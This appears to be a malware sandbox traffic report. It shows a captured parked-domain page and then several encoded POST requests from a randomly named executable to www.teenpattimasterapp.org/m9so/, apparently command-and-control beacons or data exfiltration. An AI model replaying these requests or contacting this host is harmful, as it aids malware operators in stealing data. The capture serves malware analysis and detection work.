                                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                    pragma: no-cache
                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_wBmBcKxKkmM19sIF6F01XRHLuogtHhb3xRL9OvNQnEdRvsKIkUDGrDKdk5aqeW9/HcaA75aUZL0ftsqIncLaJQ==
                                                                                    last-modified: Mon, 18 Mar 2024 13:49:24 GMT
                                                                                    x-cache-miss-from: parking-5747c769c4-km6mz
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 32 43 46 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 77 42 6d 42 63 4b 78 4b 6b 6d 4d 31 39 73 49 46 36 46 30 31 58 52 48 4c 75 6f 67 74 48 68 62 33 78 52 4c 39 4f 76 4e 51 6e 45 64 52 76 73 4b 49 6b 55 44 47 72 44 4b 64 6b 35 61 71 65 57 39 2f 48 63 61 41 37 35 61 55 5a 4c 30 66 74 73 71 49 6e 63 4c 61 4a 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 70 6c 61 69 6e 70 61 74 68 70 72 6f 64 75 63 74 69 6f 6e 73 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 70 6c 61 69 6e 70 61 74 68 70 72 6f 64 75 63 74 69 6f 6e 73 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 70 6c 61 69 6e 70 61 74 68 70 72 6f 64 75 63 74 69 6f 6e 73 2e 63 6f 6d 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20
                                                                                    Data Ascii: 2CF<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_wBmBcKxKkmM19sIF6F01XRHLuogtHhb3xRL9OvNQnEdRvsKIkUDGrDKdk5aqeW9/HcaA75aUZL0ftsqIncLaJQ==><head><meta charset="utf-8"><title>plainpathproductions.com&nbsp;-&nbsp;plainpathproductions Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="plainpathproductions.com is your first and best source for all of the information
                                                                                    Mar 18, 2024 14:49:24.811224937 CET1286INData Raw: 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64
                                                                                    Data Ascii: youre looking for. From general topics to more of what you would expect to find here, plainpathproductio576ns.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png" href="
                                                                                    Mar 18, 2024 14:49:24.811266899 CET1286INData Raw: 61 64 65 72 2c 68 67 72 6f 75 70 2c 6d 61 69 6e 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 2c 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69
                                                                                    Data Ascii: ader,hgroup,main,nav,section,summary{display:block}audio,canvas,video{display:inline-block;*display:inline;*zoom:1}audio:not([controls]){display:none;height:0}[hidden]{display:none}html{font-size:100%;-ms-text-size-adjust:100%576;-webkit-t
                                                                                    Mar 18, 2024 14:49:24.811304092 CET1286INData Raw: 70 6f 6c 61 74 69 6f 6e 2d 6d 6f 64 65 3a 62 69 63 75 62 69 63 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 30 7d 66 6f 72 6d 7b 6d 61 72 67 69 6e 3a 30
                                                                                    Data Ascii: polation-mode:bicubic}svg:not(:root){overflow:hidden}figure{margin:0}form{margin:0}fieldset{border:0 none;margin:0;padding:0}legend{border:0;padding:0;white-space:normal;*margin-left:-7px}button,input,select,textarea{font-size:100%;margin:0;ve
                                                                                    Mar 18, 2024 14:49:24.811497927 CET1286INData Raw: 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 31 34 34 30 70 78 7d 2e 6e 63 2d 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 2d 74
                                                                                    Data Ascii: %;height:auto;max-width:1440px}.nc-container{width:100%;text-align:center;margin-top:10px}.nc-container span{font-family:Ariel,sans-serif;font-size:16px;color:#888}.content-disclaimer{font-size:10px}.content-disclaimer .sedologo{float:left;pad
                                                                                    Mar 18, 2024 14:49:24.811537981 CET611INData Raw: 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 35 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 7d 23 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 20 70 2c 23 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69
                                                                                    Data Ascii: ;padding-top:15px;padding-bottom:15px}#container-cookie-message p,#container-cookie-message a{color:#a0a0a0}#container-cookie-message p{margin-left:5%;margin-right:5%}.content-buybox{background:linear-gradient(to bottom, #666666 0%, #010101 10
                                                                                    Mar 18, 2024 14:49:24.811570883 CET1286INData Raw: 35 0d 0a 65 6d 7d 2e 63 0d 0a 41 45 36 0d 0a 6f 6e 74 65 6e 74 2d 62 75 79 62 6f 78 20 68 32 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 2e 35 65 6d 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 63 6f 6e 74 65
                                                                                    Data Ascii: 5em}.cAE6ontent-buybox h2{padding-right:.5em;text-transform:uppercase}.content-searchbox{text-align:center}.content-searchbox label{display:none}.content-searchbox input,.content-searchbox button{border-width:1px;border-style:solid;borde
                                                                                    Mar 18, 2024 14:49:24.811603069 CET1286INData Raw: 78 20 38 70 78 20 31 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 23 34 34 34 20 30 2c 20 23 33 36 33 36 33 36 20 31 30 30 25 29 7d 2e 63 6f 6e 74 65 6e 74 2d 77 65
                                                                                    Data Ascii: x 8px 10px;background:linear-gradient(to bottom, #444 0, #363636 100%)}.content-webarchive div .webarchive-block ul li:first-child{border-top:1px solid #ccc;border-top-left-radius:10px;border-top-right-radius:10px}.content-webarchive div .weba
                                                                                    Mar 18, 2024 14:49:24.811702013 CET1286INData Raw: 35 39 7d 23 63 6f 6e 74 61 69 6e 65 72 2d 66 6f 6f 74 65 72 20 61 7b 63 6f 6c 6f 72 3a 23 35 39 35 39 35 39 7d 2e 64 6f 6d 61 69 6e 20 68 31 7b 63 6f 6c 6f 72 3a 23 35 39 35 39 35 39 7d 2e 63 6f 6e 74 65 6e 74 2d 72 65 6c 61 74 65 64 6c 69 6e 6b
                                                                                    Data Ascii: 59}#container-footer a{color:#595959}.domain h1{color:#595959}.content-relatedlinks h2 span{color:#595959}.content-relatedlinks ul li{border-bottom-color:#ccc}.content-relatedlinks ul a:link,.content-relatedlinks ul a:visited{color:#2BB09f
                                                                                    Mar 18, 2024 14:49:24.811821938 CET1286INData Raw: 7b 63 6f 6c 6f 72 3a 23 39 39 39 7d 2e 63 6f 6e 74 65 6e 74 2d 77 65 62 61 72 63 68 69 76 65 20 64 69 76 20 64 69 76 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 20 68 33 20 61 3a 6c 69 6e 6b 2c 2e 63 6f 6e 74 65 6e 74 2d 77 65 62 61 72 63
                                                                                    Data Ascii: {color:#999}.content-webarchive div div.webarchive-block h3 a:link,.content-webarchive div div.webarchive-block h3 a:visited{color:#595959}.content-webarchive div div.webarchive-block h3 a:active,.content-webarchive div div.webarchive-block h3
                                                                                    Mar 18, 2024 14:49:24.993536949 CET1286INData Raw: 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6c 6f 77 65 72 63 61 73 65 7d 23 63 6f 6e 74 61 69 6e 65 72 2d 73 65 64 6f 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 74 65 78 74 2d 61 6c 69 67
                                                                                    Data Ascii: coration:none;text-transform:lowercase}#container-sedologo{display:block;text-align:center}.oneclick.twot #container-content{margin-left:5%;margin-right:5%}.content-ads ul li{padding:.6em 0}.content-ads ul li::before{content:url("//img.sedopar


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.11.204979684.32.84.32807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:49:46.684406996 CET823OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.teenpattimasterapp.org
                                                                                    Origin: http://www.teenpattimasterapp.org
                                                                                    Referer: http://www.teenpattimasterapp.org/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 45 79 57 6b 65 4c 6c 63 44 79 65 64 31 64 64 6b 6f 59 30 66 4a 58 38 6b 4a 69 6b 45 36 48 65 75 77 61 49 34 32 41 78 71 2b 4d 75 62 56 56 46 4a 4b 30 69 33 49 44 31 4c 42 52 48 36 67 67 55 33 79 6e 37 63 33 55 69 77 4f 6f 34 43 34 63 31 48 79 75 39 6c 61 68 77 6f 67 4d 47 37 54 64 6b 62 74 39 4c 50 31 7a 72 45 61 4f 76 63 6c 58 49 52 45 38 39 4f 4b 42 6f 33 4e 50 51 69 32 46 64 6a 44 36 73 38 4c 7a 2f 36 75 65 59 63 33 69 4d 6b 59 78 48 38 48 4c 35 56 65 5a 69 6d 75 36 6c 6a 44 31 64 38 69 6f 61 76 6f 70 38 30 66 73 48 6d 34 5a 4f 71 57 66 44 42 6b 71 69 50 32 61 59 57 54 67 3d 3d
                                                                                    Data Ascii: LFPxWlV=EyWkeLlcDyed1ddkoY0fJX8kJikE6HeuwaI42Axq+MubVVFJK0i3ID1LBRH6ggU3yn7c3UiwOo4C4c1Hyu9lahwogMG7Tdkbt9LP1zrEaOvclXIRE89OKBo3NPQi2FdjD6s8Lz/6ueYc3iMkYxH8HL5VeZimu6ljD1d8ioavop80fsHm4ZOqWfDBkqiP2aYWTg==


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.11.204979784.32.84.32807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:49:49.359643936 CET1163OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.teenpattimasterapp.org
                                                                                    Origin: http://www.teenpattimasterapp.org
                                                                                    Referer: http://www.teenpattimasterapp.org/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 544
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 45 79 57 6b 65 4c 6c 63 44 79 65 64 36 5a 68 6b 71 2f 67 66 63 6e 38 6c 56 53 6b 45 76 58 65 69 77 61 30 34 32 42 31 36 2b 2b 61 62 56 30 56 4a 4e 47 4b 33 46 6a 31 4c 4c 78 47 79 2f 77 55 4b 79 6e 48 2b 33 56 65 77 4f 70 63 43 35 71 68 48 31 65 39 6d 56 42 77 72 30 63 47 72 58 64 6b 72 74 39 47 65 31 78 58 45 5a 36 66 63 6d 56 51 52 58 2b 46 42 64 68 6f 31 46 76 51 68 6a 56 64 78 44 36 67 65 4c 32 79 42 75 6f 34 63 30 42 45 6b 58 52 48 39 4e 37 35 53 42 70 6a 55 2b 6f 6b 4d 44 6c 52 64 68 35 47 30 6c 4a 59 4d 58 66 76 58 36 71 36 31 43 4e 62 64 6a 4a 2b 51 79 61 4e 4f 42 75 77 44 34 35 2b 6f 77 5a 47 6c 75 5a 76 68 42 41 51 4a 62 2f 53 32 39 62 58 43 4c 45 57 71 36 52 46 58 54 67 51 50 50 43 39 75 4a 6b 7a 36 7a 70 30 61 79 2f 7a 6b 30 78 67 49 31 69 66 4f 71 68 41 69 47 45 50 38 32 75 63 38 59 63 78 54 63 39 77 55 57 76 54 65 50 62 7a 42 75 39 41 43 79 2b 53 79 43 4b 63 4f 59 76 49 68 64 49 68 4f 65 37 69 44 43 7a 79 51 57 69 2f 70 61 79 76 33 73 4e 4d 77 6f 30 75 30 77 32 2b 36 68 68 55 2b 4a 45 45 6b 57 2b 2b 7a 62 42 2b 46 4e 70 49 36 55 69 55 35 2b 52 53 6d 5a 44 6d 6d 51 43 72 44 53 77 7a 65 35 59 79 48 53 76 76 6b 72 5a 46 78 63 2f 7a 4b 55 68 2b 66 74 35 63 57 34 66 4d 79 61 5a 50 68 65 45 67 2f 30 54 62 44 69 6d 71 75 38 69 37 4d 62 77 75 6a 78 61 76 59 39 79 31 46 71 4f 33 4f 6a 55 67 6f 30 42 55 78 7a 75 68 31 33 43 51 46 70 44 76 74 52 43 66 76 37 75 6e 56 4f 7a 48 4e 37 78 43 31 6a 2f 73 72 76 4b 47 56 34 6a 57 69 38 36 6d 7a 57 4d 6f 66 6d 42 45 38 4f 65 49 44 45 4c 4d 6f 71 6a 78 56 4f 79 73 41 55 63 4a 55 66 64 35 70 56 35 36 64 55 6d 46 66 71 39 58 74 6b 2f 67 3d
                                                                                    Data Ascii: LFPxWlV=EyWkeLlcDyed6Zhkq/gfcn8lVSkEvXeiwa042B16++abV0VJNGK3Fj1LLxGy/wUKynH+3VewOpcC5qhH1e9mVBwr0cGrXdkrt9Ge1xXEZ6fcmVQRX+FBdho1FvQhjVdxD6geL2yBuo4c0BEkXRH9N75SBpjU+okMDlRdh5G0lJYMXfvX6q61CNbdjJ+QyaNOBuwD45+owZGluZvhBAQJb/S29bXCLEWq6RFXTgQPPC9uJkz6zp0ay/zk0xgI1ifOqhAiGEP82uc8YcxTc9wUWvTePbzBu9ACy+SyCKcOYvIhdIhOe7iDCzyQWi/payv3sNMwo0u0w2+6hhU+JEEkW++zbB+FNpI6UiU5+RSmZDmmQCrDSwze5YyHSvvkrZFxc/zKUh+ft5cW4fMyaZPheEg/0TbDimqu8i7MbwujxavY9y1FqO3OjUgo0BUxzuh13CQFpDvtRCfv7unVOzHN7xC1j/srvKGV4jWi86mzWMofmBE8OeIDELMoqjxVOysAUcJUfd5pV56dUmFfq9Xtk/g=


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.11.204979884.32.84.32807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:49:52.032747030 CET2572OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.teenpattimasterapp.org
                                                                                    Origin: http://www.teenpattimasterapp.org
                                                                                    Referer: http://www.teenpattimasterapp.org/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 52932
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 45 79 57 6b 65 4c 6c 63 44 79 65 64 36 5a 68 6b 71 2f 67 66 63 6e 38 6c 56 53 6b 45 76 58 65 69 77 61 30 34 32 42 31 36 2b 2b 69 62 56 47 4e 4a 4b 58 4b 33 45 6a 31 4c 48 52 47 78 2f 77 55 74 79 6e 66 36 33 56 53 47 4f 72 55 43 34 35 4a 48 30 6f 70 6d 46 52 77 71 6f 73 47 36 54 64 6b 2f 74 39 4b 73 31 78 54 55 61 4f 58 63 6c 58 59 52 41 76 46 4f 48 52 6f 33 46 76 51 39 79 46 64 54 44 37 56 62 4c 32 2b 42 75 75 67 63 6d 6b 49 6b 56 41 48 39 41 4c 35 52 4c 4a 6a 6c 6c 34 6b 74 44 68 78 4a 68 35 47 6b 6c 4d 34 4d 58 63 58 58 31 4c 36 32 4d 4e 62 64 38 35 2b 52 6a 4b 78 4b 42 75 73 68 34 35 4b 6f 77 66 6d 6c 76 35 76 68 4c 43 34 4b 62 66 53 77 33 37 58 7a 50 45 53 69 36 52 42 6c 54 67 45 50 4f 78 42 75 49 54 6e 36 30 4c 4d 61 2f 2f 7a 6d 36 52 68 43 69 79 66 6b 71 67 74 4c 47 48 48 73 32 73 51 38 58 63 52 54 4f 76 59 54 42 2f 54 59 4b 62 7a 75 35 4e 4d 34 79 2b 44 7a 43 4b 64 44 59 75 4d 68 64 5a 52 4f 64 36 69 41 50 44 79 58 61 43 2f 47 41 43 6a 35 73 4e 41 34 6f 31 47 65 77 31 53 36 68 42 55 2b 50 6a 59 6e 50 2b 2f 37 54 68 2f 49 44 4a 49 55 55 69 49 66 2b 55 71 4d 5a 79 4b 6d 52 7a 62 44 59 41 7a 64 2f 34 79 44 63 50 76 69 34 4a 46 78 63 2f 2b 35 55 68 43 66 73 49 6b 57 37 49 6f 79 52 75 37 68 63 45 67 35 30 54 62 57 69 6d 32 30 38 69 7a 6d 62 7a 48 49 78 5a 44 59 39 6d 35 46 72 4b 6a 4e 30 6b 68 73 6a 68 56 33 2b 50 63 74 33 43 4d 4e 70 41 47 57 52 77 4c 76 36 71 44 56 4b 7a 48 4f 77 78 44 63 31 76 73 39 35 36 61 7a 34 6a 61 79 38 36 54 6f 57 50 6f 66 6e 6c 56 45 57 50 30 41 53 59 34 69 33 43 5a 44 47 69 6b 6c 4c 74 78 58 54 39 77 46 62 4a 36 79 54 6c 6c 67 39 4d 50 6e 33 66 50 6e 6f 6e 49 6a 34 77 79 35 55 6c 4b 34 66 48 5a 6e 35 2f 51 76 77 55 6c 37 44 47 32 57 4c 6a 33 4d 36 51 52 39 75 69 4b 6e 66 37 6f 4f 75 64 6b 75 78 50 66 45 77 63 64 37 47 49 6f 62 6a 34 6f 64 6f 4d 35 76 5a 6d 61 33 62 5a 50 4b 33 77 5a 55 6f 57 31 6d 58 72 47 6b 58 4a 71 36 75 76 4d 79 75 77 75 74 7a 55 4c 2b 4b 4f 55 50 55 36 78 59 5a 77 35 70 38 54 52 77 2f 42 7a 58 56 4e 51 55 41 41 56 36 63 48 57 2b 66 4d 6f 4e 39 74 38 2f 64 6f 59 32 74 45 63 69 6f 31 4e 74 6b 38 74 30 2f 75 79 41 4b 64 44 78 66 7a 45 38 78 59 32 32 54 69 53 49 2f 37 32 44 62 53 6d 66 47 2b 30 48 2f 75 69 6d 31 69 33 63 74 59 4c 73 73 51 65 50 7a 2b 64 46 52 63 74 34 31 69 52 31 45 6d 51 6f 4d 57 79 68 2b 70 73 61 34 76 57 31 6d 32 70 6d 6b 42 32 67 34 54 6c 42 68 73 44 65 65 67 70 48 78 37 68 73 4f 45 68 35 6c 53 50 65 34 77 7a 72 71 61 4e 35 4a 74 73 32 43 53 79 70 63 4d 6b 50 7a 6f 48 63 54 49 70 6d 70 59 2f 39 79 54 75 39 43 63 58 62 5a 47 50 58 73 76 33 4f 2b 66 64 37 65 6e 4b 52 2b 45 49 45 43 31 71 35 6b 65 6f 68 51 56 49 51 30 6a 76 78 49 32 36 68 6c 34 41 34 58 2f 70 54 41 73 73 34 34 44 75 6c 69 65 6a 44 6d 50 4d 6e 65 69 44 39 4b 47 37 6b 42 75 7a 66 6d 37 48 31 54 52 38 4b 68 39 4d 76 53 66 7a 57 64 5a 32 6a 35 32 36 35 52 58 49 79 54 71 67 6d 68 31 70 72 2b 44 73 67 43 56 37 5a 37 46 68 35 38 55 41 46 77 70 72 46 68 6c 4d 6e 42 4e 72 74 46 41 61 54 4d 75 6b 34 65 69 5a 53 67 53 50 73 7a 50 57 43 69 72 65 61 67 6e 71 48 76 32 48 46 4d 77 70 45 6a 49 79 37 62 61 51 64 32 57 4a 47 74 54 78 54 4a 69 51 77 59 48 71 31 79 39 32 42 4d 6b 6d 2b 6f 68 69 71 39 5a 35 68 6d 58 6e 66 52 59 68 36 56 46 43 69 69 34 50 49 50 37 4c 5a 70 69 56 32 49 35 61 61 61 31 43 72 54 71 42 49 67 44 64 44 6b 52 44 49 6e 7a 54 77 52 62 32 61 43 75 53 4c 4a 66 5a 49 31 69 43 4e 64 51 66 76 4f 39 47 2b 59 38 51 32 42 56 50 54 54 6c 74 63 37 54 4e 43 62 71 52 55 31 76 56 36 6f 47 58 52 7a 31 57 35 5a 55 5a 6f 42 45 72 37 55 32 4c 6a 4d 4d 50 43 4e 48 4e 37 6f 79 67 52 71 7a 47 36 38 69 56 43 54 31 79 59 30 79 4d 42 55 52 31 62 51 7a 6b 33 56 39 36 72 6b 66 76 6d 31 65 6f 37 71 55 55 63 54 58 43 37 2b 74 4d 49 2f 76 38 79 6a 4e 48 43 4f 63 73 2b 46 79 6a 53 4d 48 2b 4d 78 4a 31 57 49 56 56 6c 6c 2b 6a 51 62 64 48 49 6e 4d 51 4f 79 7a 6e 50 67 72 57 4d 49 4f 31 63 43 6e 34 64 62 31 66 56 66 55 6b 6a 2f 52 4e 41 30 73 75 68 57 32 64 4c 5a 34 75 4f 51 68 30 38 75 4f 48 2b 63 6e 78 44 45 6e 32 39 69 45 72 6e 41 6b 4e 41 46 5a 70 74 52 66 51 64 6d 61 58 42 45 4c 38
                                                                                    Data Ascii: LFPxWlV=EyWkeLlcDyed6Zhkq/gfcn8lVSkEvXeiwa042B16++ibVGNJKXK3Ej1LHRGx/wUtynf63VSGOrUC45JH0opmFRwqosG6Tdk/t9Ks1xTUaOXclXYRAvFOHRo3FvQ9yFdTD7VbL2+BuugcmkIkVAH9AL5RLJjll4ktDhxJh5GklM4MXcXX1L62MNbd85+RjKxKBush45Kowfmlv5vhLC4KbfSw37XzPESi6RBlTgEPOxBuITn60LMa//zm6RhCiyfkqgtLGHHs2sQ8XcRTOvYTB/TYKbzu5NM4y+DzCKdDYuMhdZROd6iAPDyXaC/GACj5sNA4o1Gew1S6hBU+PjYnP+/7Th/IDJIUUiIf+UqMZyKmRzbDYAzd/4yDcPvi4JFxc/+5UhCfsIkW7IoyRu7hcEg50TbWim208izmbzHIxZDY9m5FrKjN0khsjhV3+Pct3CMNpAGWRwLv6qDVKzHOwxDc1vs956az4jay86ToWPofnlVEWP0ASY4i3CZDGiklLtxXT9wFbJ6yTllg9MPn3fPnonIj4wy5UlK4fHZn5/QvwUl7DG2WLj3M6QR9uiKnf7oOudkuxPfEwcd7GIobj4odoM5vZma3bZPK3wZUoW1mXrGkXJq6uvMyuwutzUL+KOUPU6xYZw5p8TRw/BzXVNQUAAV6cHW+fMoN9t8/doY2tEcio1Ntk8t0/uyAKdDxfzE8xY22TiSI/72DbSmfG+0H/uim1i3ctYLssQePz+dFRct41iR1EmQoMWyh+psa4vW1m2pmkB2g4TlBhsDeegpHx7hsOEh5lSPe4wzrqaN5Jts2CSypcMkPzoHcTIpmpY/9yTu9CcXbZGPXsv3O+fd7enKR+EIEC1q5keohQVIQ0jvxI26hl4A4X/pTAss44DuliejDmPMneiD9KG7kBuzfm7H1TR8Kh9MvSfzWdZ2j5265RXIyTqgmh1pr+DsgCV7Z7Fh58UAFwprFhlMnBNrtFAaTMuk4eiZSgSPszPWCireagnqHv2HFMwpEjIy7baQd2WJGtTxTJiQwYHq1y92BMkm+ohiq9Z5hmXnfRYh6VFCii4PIP7LZpiV2I5aaa1CrTqBIgDdDkRDInzTwRb2aCuSLJfZI1iCNdQfvO9G+Y8Q2BVPTTltc7TNCbqRU1vV6oGXRz1W5ZUZoBEr7U2LjMMPCNHN7oygRqzG68iVCT1yY0yMBUR1bQzk3V96rkfvm1eo7qUUcTXC7+tMI/v8yjNHCOcs+FyjSMH+MxJ1WIVVll+jQbdHInMQOyznPgrWMIO1cCn4db1fVfUkj/RNA0suhW2dLZ4uOQh08uOH+cnxDEn29iErnAkNAFZptRfQdmaXBEL8v8U8e5ob2JzB76W3JvYQCAcm+034SZHwa1Sx6VRU7SBvKMj1ocliR9ZjqX0ogEMvcDtJl/GxSt1Wa89ursD/LEm+rCikv4engSKxzP6w6GVa/T+je9mpYmSwGK8LfJQ6CYEq07X422t4yaEIJ3rxQaFaIHwTnVSKTYfWEVTbSfBf62YsVDBq7qQsXq9BwpBjsGwoe3TAE9glnP/C7CrIg2Uq9XPPsoDJO/D3GGpYl4xS7uBplrX6eet8q+m2SNOoiu7oK64KUk7QevKjX1wuBgCWpHNKY8Y68laCfeVMN3Gm7jd9Osr0E7SI0xAMByvdXjLrGieYJPt5sp6K9Yw6WFLWZHr/vRl+JpQHU8GF6tvCNqe4/hmuIyNS+gQyUdfIAgnZ85DYKL2gZv8FALWJUETEaM4hBaxtBVNS5qJku/Lx4HSQUEBOkUAp1UqsjKhzzF7OfQdHzS+I2DspA70OzKuQd56MEA1ivJxs9WUAIpjVWQof+6CRa8CuUGyqIZqC+0JGXh0JMYg3JyLKw/x2uBKBJzirnVvyb/uD2kdxA88aXePgGNuDElaRk10cUCjmgoPg3CNaxs7P
